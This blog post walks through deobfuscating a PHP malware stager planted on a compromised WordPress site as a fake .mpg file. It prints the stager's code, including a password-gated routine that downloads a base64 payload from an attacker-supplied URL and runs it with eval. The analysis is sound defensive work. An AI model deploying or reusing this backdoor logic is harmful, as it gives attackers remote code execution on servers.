Deobfuscating a Malware Stager
I was recently approached by a friend about a WordPress site they manage that had been compromised. While they planned on wiping the site entirely to make sure nothing malicious was left behind, something they had been looking forward to doing anyway, they did offer to let me look over some of the malicious files to see if I could glean any interesting info. There were dozens of files, most of which had random gibberish as file names.
With their permission, today I’ll be going over my process for deobfuscating one of the files found there, bqyejP.mpg. Both the original file and the deobfuscated version can be found here. Just know that your antivirus will probably try to prevent you from unzipping the file.
Deobfuscating A Video?
Now, this file caught both of our eyes not only because it has the MPG file extension, but also because it was placed in a folder named the same as this friend’s username! A username that they were confident wasn’t referenced anywhere on this compromised site! Concerned that this may be something freaky, they left it to me to check the file out. Much to our relief, it was not a video at all, but a PHP file that had been given the mpg extension.
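A quick way to confirm this kind of disguise without trusting the extension is to look at the start of the file. The following is a minimal sketch under stated assumptions: the helper name looksLikeDisguisedPhp and the 1 KB read window are made up for illustration, and the check only looks for a PHP open tag, so it is nowhere near a full malware scanner.

```php
<?php
// Hypothetical helper (not from the compromised site): reports whether a file
// that does not claim to be PHP still contains a PHP open tag near its start.
function looksLikeDisguisedPhp(string $path): bool
{
    $extension = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    if (in_array($extension, ["php", "phtml"], true)) {
        return false; // openly PHP, so not disguised
    }
    // Read only the first 1024 bytes; the window size is an arbitrary assumption.
    $head = @file_get_contents($path, false, null, 0, 1024);
    return $head !== false && stripos($head, "<?php") !== false;
}

// Demo with a throwaway file standing in for something like bqyejP.mpg.
$demoPath = sys_get_temp_dir() . "/demo_" . uniqid() . ".mpg";
file_put_contents($demoPath, "<?php echo 'not a video';");
var_dump(looksLikeDisguisedPhp($demoPath)); // bool(true)
unlink($demoPath);
```

Running something like this over an uploads directory would only flag candidates for manual review; a genuine MPEG file starts with binary start codes rather than text.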
Step 0: Make It Readable
My first step in deobfuscating the file is throwing it in a text editor. In this case I went with Notepad++ due to its willingness to open any file regardless of its contents, as well as its powerful regular expression find/replace capabilities.
Upon opening the file, the first thing I’m greeted with is a wall of webdings and Unicode characters.
<?php $vb /*-bG;8><b-*///
= /*-d6v$}L9y?2-*///
"r"./*-
⇡┾↺﹄➯♛↩㊟
tZ[`@⇡┾↺﹄➯♛↩㊟
-*///
"a"."n"./*-94mNXY-*///
"g"."e"; /*-
▼⑲│$⊹☂▬⋘Ⓡ✐▩≃⓫➼ø⇦¿⋽∮◦﹫⋉⇋
7N▼⑲│$⊹☂▬⋘Ⓡ✐▩≃⓫➼ø⇦¿⋽∮◦﹫⋉⇋
-*///
// ...
The entire file looks like this: a couple snippets of actual PHP code with large chunks of comments separating them. To get the file anywhere near legible, let’s start by removing all the comments. To accomplish this, I found that the regex /\/\*.+?\*\/\/{2}?\n?/gm correctly finds all of these blocks for me, provided the “. matches newline” option in Notepad++ is enabled, since most of the comments span several lines. I can then replace all of them with nothing, which gets me just the code, and all of it on one line. If I now use a plugin to format this, I get the following.
<?php
$vb = "r" . "a" . "n" . "g" . "e";
$ZM = $vb("~", " ");
$Nz = ${$ZM[6 + 25] . $ZM[43 + 16] . $ZM[13 + 34] . $ZM[22 + 25] . $ZM[48 + 3] . $ZM[35 + 18] . $ZM[41 + 16]};
if ((in_array(gettype($Nz) . count($Nz), $Nz) && count($Nz) == 20)) {
(($Nz[62] = $Nz[62] . $Nz[76]) && ($Nz[90] = $Nz[62]($Nz[90])) && (@eval($Nz[62](${$Nz[36]}[14]))));
}
// ...
Already we can see a handful of the tactics we’ll be dealing with. Computed array indices, variables called as functions, obsessively concatenated strings and the like are all telltale signs of malware.
In the next step we’ll start truly deobfuscating this file. As I go through the steps, though, know that I save off a copy of the file after each major step. So far, we have two files: the original, untouched file, and the de-commented and formatted code.
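For anyone who would rather script the comment removal than do it in an editor, the same replacement can be sketched in PHP. This is not the process I used above, just an illustration: the function name stripJunkComments is made up, the pattern is a simplified equivalent of the regex from this step, and the s modifier is what lets . match across line breaks.

```php
<?php
// Hypothetical helper: remove the stager's junk comments, which all look like
// "/*- ... -*/" immediately followed by "//" and a line break.
function stripJunkComments(string $source): string
{
    // "~" is the pattern delimiter; the "s" modifier makes "." match newlines,
    // which matters because many of the comment blocks span several lines.
    return preg_replace('~/\*.+?\*///\n?~s', '', $source) ?? $source;
}

// A shortened stand-in for the first few lines of the obfuscated file.
$sample = "<?php \$vb /*-bG;8><b-*///\n= /*-d6v-*///\n\"r\"./*-\nabc\n-*///\n\"a\";";
echo stripJunkComments($sample), PHP_EOL; // <?php $vb = "r"."a";
```

A pattern this blunt would also eat a legitimate /* ... */ comment that happened to be followed by //, which is fine for this file but worth keeping in mind before reusing it elsewhere.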
Step 1: What Can be Deciphered?
The next step in my process is consolidating the more obvious parts of the code. By manually concatenating strings and solving for array indices, we can start to get a clearer picture of what’s going on. Another tool at our disposal is the PHP engine itself. By running smaller bits of code just to see what they evaluate to, we can eliminate a fair bit of the manual work. Right off the bat, we can see that $vb equals the string "range", and then $vb is used as a function on the following line. With this acknowledged, we can simplify the code to the following.
<?php
$ZM = range("~", " ");
If we were to run this in PHP and dump its value, we’d find that this returns an array of 95 single-character strings running in descending order from ~ down to the space character: capital and lowercase A through Z, numbers 0 through 9, and a handful of special characters. Given this information, we can rename $ZM to something more useful like $alphaNumRange.
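Both claims are easy to check in isolation. The sketch below shows that a string built by concatenation can be called as a function, and what the resulting array contains; the helper name rangeChar is made up for illustration.

```php
<?php
// A string built at runtime can be called like a function ("variable function").
$functionName = "r" . "a" . "n" . "g" . "e";
$viaString = $functionName("~", " ");
$direct = range("~", " ");

var_dump($viaString === $direct);   // bool(true)
echo count($direct), PHP_EOL;       // 95
echo implode("", $direct), PHP_EOL; // every character from "~" down to " "

// Hypothetical helper: index $i holds the character with ASCII code 126 - $i.
function rangeChar(int $i): string
{
    return range("~", " ")[$i];
}
echo rangeChar(31), PHP_EOL; // _
```

Because the range is descending, small indices land on lowercase letters and punctuation, while larger ones reach uppercase letters, digits, and finally the space character.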
To solve the next line, $Nz = ..., we’ll go ahead and let PHP solve this for us with the following script.
<?php
$alphaNumRange = range("~", " ");
echo $alphaNumRange[6 + 25] . $alphaNumRange[43 + 16] . $alphaNumRange[13 + 34] . $alphaNumRange[22 + 25] . $alphaNumRange[48 + 3] . $alphaNumRange[35 + 18] . $alphaNumRange[41 + 16];
Running this tells us that the string being built here is _COOKIE. Because that string is wrapped in ${...}, which is PHP’s variable-variable syntax (not to be confused with the ${...} string interpolation deprecated in PHP 8.2), we now know that $Nz is being assigned the $_COOKIE superglobal.
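If the ${...} form is unfamiliar, here is a small sketch of how it resolves a variable from a name built at runtime. The function and variable names are made up for illustration; only the last two lines mirror what the stager does.

```php
<?php
// ${expr} evaluates expr to a string and uses that string as a variable name.
function lookupLocalByName(): string
{
    $secret = "resolved";
    $name = "sec" . "ret"; // built at runtime, like the stager's "_COOKIE"
    return ${$name};       // same as reading $secret
}
echo lookupLocalByName(), PHP_EOL; // resolved

// At the top level of a script, the same trick reaches a superglobal.
$cookies = ${"_" . "COOKIE"};
var_dump(is_array($cookies)); // bool(true); an empty array when run from the CLI
```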
Admittedly, exactly what these next few lines are doing is hard for me to tell. Knowing that $Nz == $_COOKIE, the condition for this if statement seems quite clear. Since in_array searches values rather than keys, it passes only if some cookie’s value is the string array<count of cookies> and the count of cookies is 20 (meaning a cookie with the value array20 must be present); only then is the next line executed. What this next line does, though, is indeterminable because we don’t know what cookies the attacker would’ve sent with the request. Furthermore, keys of the $_COOKIE array much higher than 20 are being accessed here. That looks odd next to a cookie count of 20, but $_COOKIE is keyed by cookie name rather than by position, so cookies literally named 62, 76, 90, and 36 can exist among just 20 cookies. What we can be sure of is that $Nz[62] becomes a function name by concatenating $Nz[62] and $Nz[76]. That function is first called on $Nz[90], and then on element 14 of whichever variable $Nz[36] names, with the result of that second call passed to eval.
$Nz = $_COOKIE;
if ((in_array(gettype($Nz) . count($Nz), $Nz) && count($Nz) == 20)) {
(($Nz[62] = $Nz[62] . $Nz[76]) && ($Nz[90] = $Nz[62]($Nz[90])) && (@eval($Nz[62](${$Nz[36]}[14]))));
}
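To see what the in_array test actually checks, and why keys such as 62 are compatible with a count of 20, the condition can be run against a stand-in array. This is only a sketch: the function name passesCookieGate and every cookie name and value below are made-up placeholders, since the attacker’s real cookies are unknown.

```php
<?php
// Same condition as the stager's if statement, applied to any array.
function passesCookieGate(array $cookies): bool
{
    return in_array(gettype($cookies) . count($cookies), $cookies)
        && count($cookies) == 20;
}

// Made-up stand-in for $_COOKIE: keys are cookie names, values are inert placeholders.
$fakeCookies = ["62" => "a", "76" => "b", "90" => "c", "36" => "d", "marker" => "array20"];
for ($i = 0; count($fakeCookies) < 20; $i++) {
    $fakeCookies["pad" . $i] = "x";
}

var_dump(count($fakeCookies));            // int(20)
var_dump(isset($fakeCookies[62]));        // bool(true): 62 is a key, not a position
var_dump(passesCookieGate($fakeCookies)); // bool(true)
```

Note that in_array matches on the value "array20" here; a cookie merely named array20 would not satisfy the condition.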
Cleaning up the Class
After this block is a class of some sort. The line immediately after the class calls one of its static functions. Given this, we can rename the class to Stager, and rename that function to main.
class Stager
{
static function hsn($FdyqJwSrTo)
{
//...
}
static function hCejx($xmeTW, $zroVRZOQK)
{
//...
}
static function main()
{
$OShi = array("29294{29279{29292{29296{29277{29292{29298{29291{29276{29283{29294{29277{29288{29282{29283", //...
foreach ($OShi as $yl)
$TSPfKDnYk[] = self::hsn($yl);
$qTtn = @$TSPfKDnYk[1](${"_" . "G" . "E" . "T"}[$TSPfKDnYk[6 + 3]]);
$FHGrkbXv = @$TSPfKDnYk[2 + 1]($TSPfKDnYk[1 + 5], $qTtn);
$wFyhs = $TSPfKDnYk[0 + 2]($FHGrkbXv, true);
@${"_" . "G" . "E" . "T"}[$TSPfKDnYk[0 + 10]] == 1 && die($TSPfKDnYk[0 + 5](__FILE__));
if (((@$wFyhs[0] - time()) > 0) and (md5(md5($wFyhs[2 + 1])) === "bc73324f3b90c07811d595547a663224")):
$JjnD = self::hCejx($wFyhs[1 + 0], $TSPfKDnYk[0 + 5]);
@eval($TSPfKDnYk[4 + 0]($JjnD));
die;
endif;
}
}
Stager::main();
Going into the main function, the first thing we see is an array of strings made up of numbers and opening curly braces. We’ll ignore this for now, and assume it’ll make more sense later. In fact, the next two lines iterate over this array! The loop calls the hsn function on each element of this array, and appends the output to a new array. So, what’s hsn doing?
Decoding hsn
static function hsn($FdyqJwSrTo)
{
$eNulC = "r" . "a" . "n" . "g" . "e";
$NIg = $eNulC("~", " ");
$lXmY = explode("{", $FdyqJwSrTo);
$eNy = "";
foreach ($lXmY as $Rp => $KYRqDkw)
$eNy .= $NIg[$KYRqDkw - 29267];
return $eNy;
}
Even at just a glance, we can tell that this looks an awful lot like the decoding mechanism at the start of the file. We have a string built to hold the value range, and we then use that string for a function call. This is the same alphanumeric range we used earlier. We then explode the input on any { characters to create an array of numbers. Each number then has a constant offset, 29267, subtracted from it to get an index into the alphanumeric range. This explains the odd array we saw in the main function then!
Given all of the above, we can then rewrite the function to something like the following.
static function decode($input)
{
$alphaNumRange = range("~", " ");
$rangeIndices = explode("{", $input);
$output = "";
foreach ($rangeIndices as $i => $indexOffset)
{
$output .= $alphaNumRange[$indexOffset - 29267];
}
return $output;
}
If we then move this decoder function and the $OShi array from main into a separate file and dump the output, we get the following values. At the same time, we’ll rename $OShi to $encodedParts.
$encodedParts = [
"create_function",
"str_rot13",
"json_decode",
"pack",
"base64_decode",
"file_get_contents",
"H*",
"}",
"/*",
"ARRAY",
"of"
];
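For reference, the separate file can be as small as the sketch below. It uses a standalone function (decodePart, a name chosen here for illustration) instead of the class method, and only three of the encoded strings from main to keep it short.

```php
<?php
// Standalone version of the decoder: split on "{", subtract the constant
// offset, and use the result as an index into the descending range.
function decodePart(string $input): string
{
    $alphaNumRange = range("~", " ");
    $output = "";
    foreach (explode("{", $input) as $number) {
        $output .= $alphaNumRange[(int) $number - 29267];
    }
    return $output;
}

// Three of the encoded strings taken from main().
$samples = ["29281{29296{29294{29286", "29321{29351", "29282{29291"];
foreach ($samples as $encoded) {
    echo $encoded, " => ", decodePart($encoded), PHP_EOL;
}
// 29281{29296{29294{29286 => pack
// 29321{29351 => H*
// 29282{29291 => of
```

Taking the first number as a worked example: 29281 - 29267 = 14, and index 14 of the range is the character with ASCII code 126 - 14 = 112, which is p.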
Consolidating main
With this array, we can solve much of the rest of the main function by replacing the $encodedParts lookups with their actual values. By doing this, we now have something like this.
static function main()
{
$encodedParts = [
// create_function
"29294{29279{29292{29296{29277{29292{29298{29291{29276{29283{29294{29277{29288{29282{29283",
// str_rot13
"29278{29277{29279{29298{29279{29282{29277{29344{29342",
// json_decode
"29287{29278{29282{29283{29298{29293{29292{29294{29282{29293{29292",
// pack
"29281{29296{29294{29286",
// base64_decode
"29295{29296{29278{29292{29339{29341{29298{29293{29292{29294{29282{29293{29292",
// file_get_contents
"29291{29288{29285{29292{29298{29290{29292{29277{29298{29294{29282{29283{29277{29292{29283{29277{29278",
// H*
"29321{29351",
// }
"29268",
// /*
"29346{29351",
// ARRAY
"29328{29311{29311{29328{29304",
// of
"29282{29291"
];
// Decode every entry into a separate array, as the original loop did
foreach ($encodedParts as $encoded) {
$decodedParts[] = self::decode($encoded);
}
// The stager's payload -- ROT13-decoded into a hexadecimal string
$commandPayload = @str_rot13($_GET["ARRAY"]);
// The stager's payload -- hex-decoded into a JSON array string
$unpackedPayload = @pack("H*", $commandPayload);
// The stager's payload -- parsed into a PHP array
$payloadArray = json_decode($unpackedPayload, true);
// If the GET param named "of" equals 1, dump this file's contents and exit
@$_GET["of"] == 1 && die(file_get_contents(__FILE__));
if (
( // Check if the first user-provided value is greater than the server time
(@$payloadArray[0] - time()) > 0
) && ( // Check if the user-provided value matches a hard-coded password
md5(md5($payloadArray[3])) === "bc73324f3b90c07811d595547a663224"
)
) {
// unknown for now
$unknownReturn = self::hCejx($payloadArray[1], "file_get_contents");
// evaluate the new payload after base64 decoding
@eval(base64_decode($unknownReturn));
die;
}
}
Now we can get a slightly clearer picture of what the stager is doing. We can see that the function is taking input from a GET request, and it’s coming in the form of a JSON-encoded array of values that has been hex-encoded and then run through ROT13. The first check, $_GET["of"], seems to be a way to confirm the file is still in place by dumping its own contents and dying. The second check then only allows the stager to fire if two conditions are met.
First, the first element of the input array must be a time value that is greater than the server time, so each request effectively carries an expiry timestamp. Second, the fourth element must match a hard-coded, double MD5 hashed password. This serves as a loose guarantee that no other adversary uses the script while the attacker is working, or even after they’re done. At this time, I have not cracked this password, though it could be fairly easy with the right machine. I leave this as an exercise for you, reader.
Once those two conditions are met, the stager calls the class’s hCejx function and then evaluates the base64-decoded output.
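Had any request logs been available, a captured ARRAY value could be unwrapped by repeating the same three steps main performs. The sketch below is a hypothetical log-analysis helper, not something taken from the stager: the name decodeStagerParam, the validation checks, and the sample values are all assumptions. One handy detail is that ROT13 leaves digits alone and turns a through f into n through s, so an encoded value would consist only of digits and the letters n to s.

```php
<?php
// Hypothetical log-analysis helper: unwrap a captured "ARRAY" parameter by
// applying the same three steps main() does (ROT13, hex decode, JSON decode).
function decodeStagerParam(string $raw): ?array
{
    $hex = str_rot13($raw);
    // Bail out early on anything that is not an even-length hex string.
    if ($hex === "" || strlen($hex) % 2 !== 0 || !ctype_xdigit($hex)) {
        return null;
    }
    $decoded = json_decode(pack("H*", $hex), true);
    return is_array($decoded) ? $decoded : null;
}

// Round-trip demo with inert, made-up values (no real URL or password).
$sample = str_rot13(bin2hex(json_encode(
    [4102444800, "https://example.invalid/stage2", "", "placeholder"]
)));
print_r(decodeStagerParam($sample));
var_dump(decodeStagerParam("not hex at all")); // NULL
```

In a decoded array, element 0 would be the expiry timestamp, element 1 the location of the next payload, and element 3 the password candidate.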
Translating hCejx
Right off the bat, it’s almost too obvious what hCejx is doing.
static function hCejx($xmeTW, $zroVRZOQK)
{
$SvpJWtNAd = curl_init($xmeTW);
curl_setopt($SvpJWtNAd, CURLOPT_RETURNTRANSFER, 1);
$MOj = curl_exec($SvpJWtNAd);
return empty($MOj) ? $zroVRZOQK($xmeTW) : $MOj;
}
Given that we have a curl_init call using $xmeTW, we can tell we’re making a remote call to some resource. Following some assumptions about how PHP cURL calls work, we can then easily rewrite this function to something like the following.
static function fetchRemotePayload($url, $callback)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
return empty($response) ? $callback($url) : $response;
}
In case you missed it, we know that the second parameter sent to this function is file_get_contents, so that’s how we know that $zroVRZOQK is a callback function of some kind. It is only invoked when the cURL response comes back empty.
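The “try one fetcher, fall back to another” shape is easier to see with the network taken out of the picture. The sketch below is a generic illustration with injected stand-in fetchers; fetchWithFallback and the three closures are made-up names, and nothing in it contacts a server.

```php
<?php
// Generic illustration of the "primary, else fallback" shape of the function above.
// Both fetchers are injected stand-ins, so nothing here touches the network.
function fetchWithFallback(string $target, callable $primary, callable $fallback)
{
    $response = $primary($target);
    // empty() is true for false, "", "0", null and [], so any of those triggers the fallback.
    return empty($response) ? $fallback($target) : $response;
}

$failing = fn(string $t) => false;            // curl_exec() returns false on failure
$working = fn(string $t) => "primary:" . $t;
$local   = fn(string $t) => "fallback:" . $t;

echo fetchWithFallback("demo", $working, $local), PHP_EOL; // primary:demo
echo fetchWithFallback("demo", $failing, $local), PHP_EOL; // fallback:demo
```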
Finishing main
Now that we’ve translated hCejx into fetchRemotePayload, we can finish our analysis of main.
static function main()
{
//...
if (/* ... */) {
// Fetch a new payload from a user-provided URL
$finalPayload = self::fetchRemotePayload($payloadArray[1], "file_get_contents");
// evaluate the new payload after base64 decoding
@eval(base64_decode($finalPayload));
die;
}
}
Step 2: The Big Picture
With the file now deobfuscated, the last step is to figure out what its purpose was. Despite a couple of missing pieces, namely the cookie values the attacker would have sent to drive the $_COOKIE block, the general purpose of the script can be inferred.
This file served as a staging ground from which the attacker could call other scripts. Using the Stager::fetchRemotePayload function, the attacker could either load a script from a web-accessible server they control, or they could, using the file_get_contents callback, load a file from the compromised server.
By using HTTP cookies and GET parameters to pass arguments to the script, the attacker has taken steps to prevent us from knowing what they truly used the script to do. Unfortunately, by the time my friend and I had noticed this use of GET params, my friend had already wiped the server, and thus the HTTP logs, so even that half of the equation is lost to us.
Lessons Learned
Even without exact knowledge of what the attacker did, there are still some very useful things to be learned by analyzing this script.
We can see the lengths that attackers must go to in order to get their payloads onto a server. With most servers being behind a WAF these days, even seemingly innocuous function calls like range get obfuscated into concatenated strings that are then called as functions.
Another interesting thing to see is the use of a custom encoding method. The way the Stager class stores its strings as lists of numbers that are later offset into indices of the range is certainly something to take note of.
The last major point I’d like to highlight is the script’s ability to fetch payloads from a remote server. While it’s capable of loading files from its host, the ability to get a payload from elsewhere allows it to leave a significantly smaller footprint on its host. This smaller footprint helps to reduce the likelihood of a server admin noticing it.